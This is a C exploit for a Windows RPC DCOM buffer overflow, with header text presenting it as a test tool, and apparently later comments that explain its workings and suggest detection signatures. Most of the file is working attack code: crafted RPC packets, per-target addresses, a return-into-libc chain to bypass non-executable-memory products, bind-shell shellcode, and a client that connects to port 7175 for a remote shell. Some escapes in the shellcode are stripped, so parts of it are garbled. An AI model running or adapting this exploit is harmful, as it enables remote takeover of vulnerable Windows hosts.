Summary: A vulnerability in the RPC server allows remote attackers to cause the service to execute arbitrary code. The following exploit code can be used to test your system for this vulnerability, even if one of the following protection mechanisms has been implemented: OverflowGuard or StackDefender.
Exploit:
/*
* have you recently bought one of those expensive new windows security products
* on the market? do you think you now have strong protection?
* Look again:
*
* *rpc!exec*
* by ins1der (trixterjack yahoo com)
*
* windows remote return into libc exploit!
*
* remote rpc exploit breaking non exec memory protection schemes
* tested against :
* OverflowGuard
* StackDefender (kernel32 imagebase randomization:O nice try guys.)
*
*
* currently breaking:
* Windows 2000 SP0 (english)
* Windows XP SP0 (english)
*
* to get new offsets use this:
* ------------------------------
* #include
* #include
*
* int main()
* {
* HANDLE h1,h2;
* unsigned long addr1,addr2,addr3,addr4;
* h1=LoadLibrary("ntdll.dll");
* h2=LoadLibrary("MSVCRT.dll");
* addr1=(unsigned long)GetProcAddress(h1,"NtAllocateVirtualMemory");
* addr2=(unsigned long)GetProcAddress(h2,"memcpy");
* addr3=(unsigned long)GetProcAddress(h1,"NtProtectVirtualMemory");
* for (addr4=addr1;addr4
* {
* if (!memcmp((void*)addr4,"xc9xc3",2)) break;
* }
* printf("0x%x 0x%x 0x%x 0x%xn",addr1,addr2,addr3,addr4);
* return 0;
* }
* -----------------------------
* to get the last offset use a standard rpc dcom exploit with the last
* x90x90 before the shellcode replaced with xcdx21. run the exploit
* and read the drwatson logs. subtract 0xA5 from the fault address.
*
*
* Shouts go to:
* w00pz, SpaceCow, Int3, lacroix, misu200, j00(xor),
* s0ny, crisis, and to all my true friends.
*
*
* Enjoy!
*
*/
#include
#include
/* Raw DCE/RPC bind PDU; main() sends it first, then reads the response
 * into a scratch buffer without checking it.  The leading 0x05,0x00,0x0B
 * is an RPC v5 header with packet type 0x0B (BIND). */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
/* First part of the request PDU (0x05,0x00,0x00 = RPC v5 REQUEST).  main()
 * copies it verbatim into buf2 and then adds sizeof(shell)-0xc to the
 * 32-bit length fields at offsets 0x8, 0x10, 0x80, 0x84, 0xb4, 0xb8, 0xd0
 * and 0x18c so the marshalled sizes account for the embedded payload.
 * The "MEOW" (0x4D,0x45,0x4F,0x57) markers are part of the marshalled
 * object data; from a detection standpoint this fixed prefix plus the
 * oversized UTF-16 path that follows is the observable signature. */
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
/* Counted-string header for the UTF-16LE path: two 32-bit character counts
 * (0x20 each, which main() increases by sizeof(shell)/2) followed by the
 * first two characters, "\\".  The payload buffer is inserted directly
 * after this in main(), i.e. inside the path string. */
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
};
/* Tail of the path string, UTF-16LE: "\C$\123456" followed by fifteen '1'
 * characters, ".doc" and a NUL terminator.  Together with request2 and the
 * embedded payload this forms the overlong UNC-style path that triggers the
 * overflow; the fixed "\C$\" ... ".doc" tail is a usable IDS signature. */
unsigned char request3[]={
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
/* Trailing marshalled data appended after the path string; sent unchanged. */
unsigned char request4[]={
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/* One row of the target table: the addresses needed for a single
 * OS / service-pack / language combination.  Every address is absolute,
 * which is why the header comment can only claim the two builds it lists
 * and why load-address randomisation of the DLLs involved breaks the
 * chain (the author's remark about "kernel32 imagebase randomization"
 * notwithstanding, the addresses here are in ntdll and msvcrt). */
struct offset
{
    char *description;      /* human-readable target name, printed by main() */
    unsigned long valloc;   /* NtAllocateVirtualMemory (per the header comment) */
    unsigned long amemcpy;  /* msvcrt memcpy (per the header comment) */
    unsigned long vprot;    /* NtProtectVirtualMemory (per the header comment) */
    unsigned long ret;      /* address of a 0xC9 0xC3 (leave; ret) sequence in ntdll */
    unsigned long frame;    /* stack address derived from a Dr. Watson fault address */
};
/* Hard-coded per-target offsets, selected by the index given as argv[2]
 * (not range-checked; see main()).  The table ends with an all-NULL/zero
 * sentinel that main() uses to stop the usage listing. */
struct offset targets[]=
{
{"Windows 2000 SP0 (english)",
0x77f95da9,
0x78001194,
0x77f82ffb,
0x77f96800,
0x52f770
}
,
{"Windows XP SP0 (english)",
0x77f7e4c3,
0x77c42e10,
0x77f7ec43,
0x77f80a07,
0x5bf79c
}
,
{NULL,0,0,0,0,0}
};
/*
 * Payload buffer inserted into the path string by main().
 *
 * NOTE(review): the backslashes of the "\xNN" escapes were stripped when
 * this page was extracted, so the literal as printed is plain ASCII text
 * ("x46x00...") and NOT the original byte sequence; the layout below is
 * read from the intended escapes.  As the author laid it out, the buffer
 * holds a short UTF-16LE prefix, two 0xffffffff words, two words of
 * 0x7ffde0cc, a run of 0x90 (NOP) bytes, and finally the machine code.
 *
 * prepare_ret() overwrites offsets 32..39 with fr1, 48..139 with rets
 * and 140..155 with the fixed destination address and sizeof(shell)
 * (sizeof includes the string literal's terminating NUL).  The sequence
 * x02x00x1cx07 in the machine-code part looks like a sockaddr_in with
 * port 0x1c07 = 7175, which is the port main() connects back to after
 * sending the request, i.e. the payload is expected to open a listener
 * there.  An unexpected listener on TCP/7175 on an RPC host is therefore
 * a strong post-compromise indicator for this particular sample.
 */
unsigned char shell[]=
"x46x00x58x00"
"x4Ex00x42x00"
"x46x00x58x00"
"x46x00x58x00"
"x4Ex00x42x00x46x00x58x00x46x00x58x00x46x00x58x00"
"xffxffxffxff"
"xffxffxffxff"
"xccxe0xfdx7f"
"xccxe0xfdx7f"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90"
"x83xecx34x8bxf4xe8x47x01x00x00x89x06xffx36x68x8e"
"x4ex0execxe8x61x01x00x00x89x46x08xffx36x68xadxd9"
"x05xcexe8x52x01x00x00x89x46x0cx68x6cx6cx00x00x68"
"x33x32x2ex64x68x77x73x32x5fx54xffx56x08x89x46x04"
"xffx36x68x72xfexb3x16xe8x2dx01x00x00x89x46x10xff"
"x36x68xefxcexe0x60xe8x1ex01x00x00x89x46x14xffx76"
"x04x68xcbxedxfcx3bxe8x0ex01x00x00x89x46x18xffx76"
"x04x68xd9x09xf5xadxe8xfex00x00x00x89x46x1cxffx76"
"x04x68xa4x1ax70xc7xe8xeex00x00x00x89x46x20xffx76"
"x04x68xa4xadx2exe9xe8xdex00x00x00x89x46x24xffx76"
"x04x68xe5x49x86x49xe8xcex00x00x00x89x46x28xffx76"
"x04x68xe7x79xc6x79xe8xbex00x00x00x89x46x2cx33xff"
"x81xecx90x01x00x00x54x68x01x01x00x00xffx56x18x50"
"x50x50x50x40x50x40x50xffx56x1cx8bxd8x57x57x68x02"
"x00x1cx07x8bxccx6ax16x51x53xffx56x20x57x53xffx56"
"x24x57x51x53xffx56x28x8bxd0x68x65x78x65x00x68x63"
"x6dx64x2ex89x66x30x83xecx54x8dx3cx24x33xc0x33xc9"
"x83xc1x15xabxe2xfdxc6x44x24x10x44xfex44x24x3dx89"
"x54x24x48x89x54x24x4cx89x54x24x50x8dx44x24x10x54"
"x50x51x51x51x6ax01x51x51xffx76x30x51xffx56x10x8b"
"xccx6axffxffx31xffx56x0cx8bxc8x57xffx56x2cxffx56"
"x14x55x56x64xa1x30x00x00x00x85xc0x78x0cx8bx40x0c"
"x8bx70x1cxadx8bx68x08xebx09x8bx40x34x8bxa8xb8x00"
"x00x00x8bxc5x5ex5dxc2x04x00x53x55x56x57x8bx6cx24"
"x18x8bx45x3cx8bx54x05x78x03xd5x8bx4ax18x8bx5ax20"
"x03xddxe3x32x49x8bx34x8bx03xf5x33xffxfcx33xc0xac"
"x3axc4x74x07xc1xcfx0dx03xf8xebxf2x3bx7cx24x14x75"
"xe1x8bx5ax24x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8b"
"x04x8bx03xc5xebx02x33xc0x8bxd5x5fx5ex5dx5bxc2x04"
"x00x90x90x90x80xbfx32x94x80xbfx32x94";
/* The first two stack slots of the chain: a saved frame pointer and the
 * return address that is overwritten.  prepare_ret() fills this from
 * targets[id] and copies it to shell+32. */
struct frame1
{
    unsigned long frame0;   /* targets[id].frame */
    unsigned long ret;      /* targets[id].ret, the leave;ret gadget */
}fr1;
/*
 * The three chained call frames exactly as they are laid on the stack,
 * one unsigned long per slot (23 slots; 92 bytes when unsigned long is
 * 32 bits, which the original Win32 build assumes).  prepare_ret() fills
 * the fields and copies the whole struct to shell+48.
 *
 * Reading the field names against the routines named in the header
 * comment, the layout appears to be three groups of
 *   frame pointer, callee address, return address, arguments...
 * for NtAllocateVirtualMemory, memcpy and NtProtectVirtualMemory in
 * turn.  This is the "return into libc" construction the header
 * describes: existing code is called with attacker-chosen arguments to
 * make a region writable, fill it, and then make it executable, so a
 * non-executable-stack product that does not also constrain page
 * permission changes sees no foreign code until it is too late.
 */
struct retstruct
{
    unsigned long frame1;
    unsigned long valloc;     /* NtAllocateVirtualMemory */
    unsigned long ret1;
    unsigned long dummy1;     /* set to 0xffffffff by prepare_ret() */
    unsigned long pointer11;
    unsigned long zero;
    unsigned long pointer12;
    unsigned long type;       /* 0x3000 */
    unsigned long prot;       /* 0x4 */
    unsigned long frame2;
    unsigned long amemcpy;    /* memcpy */
    unsigned long ret2;
    unsigned long dest;       /* fixed destination address */
    unsigned long src;
    unsigned long size2;      /* sizeof(shell) */
    unsigned long frame3;
    unsigned long vprot;      /* NtProtectVirtualMemory */
    unsigned long ret3;
    unsigned long dummy2;     /* set to 0xffffffff by prepare_ret() */
    unsigned long pointer21;
    unsigned long pointer22;
    unsigned long newprot;    /* 0x20 */
    unsigned long oldprot;
}rets;
/*
 * Fill fr1 and rets from the selected target's offsets and splice both
 * into the payload buffer at fixed positions.  Called once from main().
 *
 * id: index into targets[].  Not range-checked here, and main() passes
 *     atoi(argv[2]) through unchecked, so an out-of-range value indexes
 *     past the table.
 *
 * The constants 0x3000, 0x4 and 0x20 are the Win32 MEM_COMMIT|MEM_RESERVE,
 * PAGE_READWRITE and PAGE_EXECUTE_READ values: the chain allocates a
 * writable region, copies the payload into it and then flips it to
 * executable.  The defensive takeaway is that a page-permission policy on
 * the original buffer alone does not stop this; the effective control is
 * preventing the initial overwrite (patching the RPC service) or
 * constraining the permission-changing calls themselves.
 *
 * NOTE(review): the stores below assume a 32-bit unsigned long / int and
 * little-endian layout (the original 2003 build); on an LP64 host
 * sizeof(rets) and the memcpy sizes differ and the (int*) stores into a
 * char array are unaligned type-punning (undefined behaviour in C).
 */
void prepare_ret(int id)
{
    /* Arguments for the allocation and protection calls. */
    rets.type=0x3000;
    rets.prot=0x4;
    rets.newprot=0x20;
    rets.valloc=targets[id].valloc;
    rets.amemcpy=targets[id].amemcpy;
    rets.vprot=targets[id].vprot;
    /* Every return slot of the first two calls is the same leave;ret gadget. */
    fr1.ret=rets.ret1=rets.ret2=targets[id].ret;
    fr1.frame0=targets[id].frame;
    /* Later frame pointers are fixed offsets from the first frame address. */
    rets.frame1=fr1.frame0+9*4;
    rets.frame2=rets.frame1+6*4;
    rets.oldprot=fr1.frame0;
    rets.frame3=rets.frame1;
    /* sizeof(shell) counts the string literal's terminating NUL. */
    rets.size2=sizeof(shell);
    rets.src=fr1.frame0;
    rets.dest=0x55555000;        /* fixed destination region for the copy */
    rets.ret3=0x5555506c;        /* presumably where execution resumes after the protect call */
    rets.dummy1=rets.dummy2=0xffffffff;
    rets.zero=0;
    /* Patch the same destination/size words into the payload itself. */
    *(int*)(shell+148)=0x55555000;
    *(int*)(shell+152)=sizeof(shell);
    *(int*)(shell+140)=0x55555000;
    *(int*)(shell+144)=sizeof(shell);
    /* Pointer arguments refer back into the first frame. */
    rets.pointer11=fr1.frame0+92;
    rets.pointer12=fr1.frame0+96;
    rets.pointer21=fr1.frame0+100;
    rets.pointer22=fr1.frame0+104;
    /* Splice: fr1 at offset 32, the whole chain at offset 48. */
    memcpy(shell+32,&fr1,sizeof(fr1));
    memcpy(shell+48,&rets,sizeof(rets));
}
/*
 * Relay bytes between the local terminal (fd 0 in, fd 1 out) and the
 * connected socket until either side fails.  main() calls this after its
 * second connect(), i.e. once something has accepted on TCP/7175.
 *
 * Behaviour is that of the original: a failed read() on the socket prints
 * a message and returns; a failed read() on stdin prints a message and
 * exit(1)s; a failed write() in either direction leaves the loop.  A
 * read() returning 0 (peer closed) is not treated as closure, so the loop
 * keeps spinning in that case.  The message literals lost their "\n"
 * escapes during extraction and are reproduced exactly as shown.
 */
void entershell(int sock)
{
    char relay[3000];
    fd_set readable;
    int got;

    FD_ZERO(&readable);
    FD_SET(sock, &readable);
    FD_SET(0, &readable);

    while (1) {
        /* select() rewrites the set, so both descriptors are re-armed each pass. */
        FD_SET(sock, &readable);
        FD_SET(0, &readable);
        if (select(FD_SETSIZE, &readable, NULL, NULL, NULL) < 0)
            break;

        if (FD_ISSET(sock, &readable)) {
            got = read(sock, relay, sizeof relay);
            if (got < 0) {
                printf("connection lostn");
                return;
            }
            if (write(1, relay, got) < 0)
                break;
        }

        if (FD_ISSET(0, &readable)) {
            got = read(0, relay, sizeof relay);
            if (got < 0) {
                printf("[-] Connection lost..n");
                exit(1);
            }
            if (write(sock, relay, got) < 0)
                break;
        }

        usleep(100);
    }

    printf("connection closedn");
}
/*
 * Entry point.  argv[1] is the target address (handed to inet_addr()),
 * argv[2] the index into targets[]; the usage line below lost its
 * angle-bracketed placeholders during extraction, as did the "\n" escapes
 * in every message.
 *
 * Flow: connect to TCP/135, send the bind PDU, send the assembled request
 * (request1 + request2 + shell + request3 + request4, with the length
 * fields adjusted for sizeof(shell)), close, sleep one second, then
 * connect to TCP/7175 on the same host and hand that socket to
 * entershell().  Returns 0 on usage or any network failure, 1 after the
 * relay ends.
 *
 * Detection: the observable sequence is a client connection to 135
 * carrying an overlong UTF-16 path of the form
 * "\\" <payload bytes> "\C$\123456111111111111111.doc", followed about a
 * second later by a connection from the same client to 7175.
 *
 * NOTE(review): the *(unsigned long *) read-modify-writes assume a 32-bit
 * little-endian unsigned long (the original Win32 build); on an LP64 host
 * they touch 8 bytes and corrupt neighbouring fields.  atoi(argv[2]) is not
 * checked against the table size, and the recv() of the bind reply is
 * neither checked nor parsed.
 */
int main(int argc, char **argv)
{
    int sock,i,len1;
    struct sockaddr_in sin;
    unsigned char buf1[0x1000],buf2[0x1000];
    if(argc<3)
    {
        printf("###############################n");
        printf("return into libc rpc exploitn");
        printf("ins1der 2003n");
        printf("downloaded on www.k-otik.comn");
        printf("*****************************************n");
        printf("usage: %s n", argv[0]);
        printf("*****************************************n");
        printf("targets:n");
        printf("-----------------------------------------n");
        /* Walk the table up to its NULL-description sentinel. */
        for (i=0;targets[i].description!= NULL;i++)
        {
            printf("%dt%sn",i,targets[i].description);
        }
        printf("-----------------------------------------n");
        return 0;
    }
    printf("Exploiting %s...n",argv[1]);
    prepare_ret(atoi(argv[2]));
    sin.sin_family=AF_INET;
    sin.sin_addr.s_addr=inet_addr(argv[1]);
    sin.sin_port=htons(135);                 /* RPC endpoint mapper port */
    if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
    {
        perror("socket ");
        return 0;
    }
    if(connect(sock,(struct sockaddr*)&sin, sizeof(sin)))
    {
        perror("connect ");
        return 0;
    }
    /* Assemble the request: the payload sits between the two halves of
     * the path string (request2 / request3). */
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    /* Character counts in request2 grow by the payload length in UTF-16 units. */
    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(shell)/2;
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(shell)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,shell,sizeof(shell));
    len1=len1+sizeof(shell);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    /* Byte-length fields at fixed offsets in the PDU grow by the payload size. */
    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(shell)-0xc;
    if (send(sock,(char*)bindstr,sizeof(bindstr),0)==-1)
    {
        perror("send");
        return 0;
    }
    /* Bind reply is drained but never inspected. */
    recv(sock,(char*)buf1,1000,0);
    if (send(sock,(char*)buf2,len1,0)== -1)
    {
        perror("send");
        return 0;
    }
    close(sock);
    sleep(1);
    /* Second connection: to the port the payload is expected to listen on. */
    sin.sin_port = htons(7175);
    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("socket");
        return(0);
    }
    if(connect(sock,(struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
    {
        printf("Exploit failedn");
        return(0);
    }
    printf("Entering shelln");
    entershell(sock);
    return 1;
}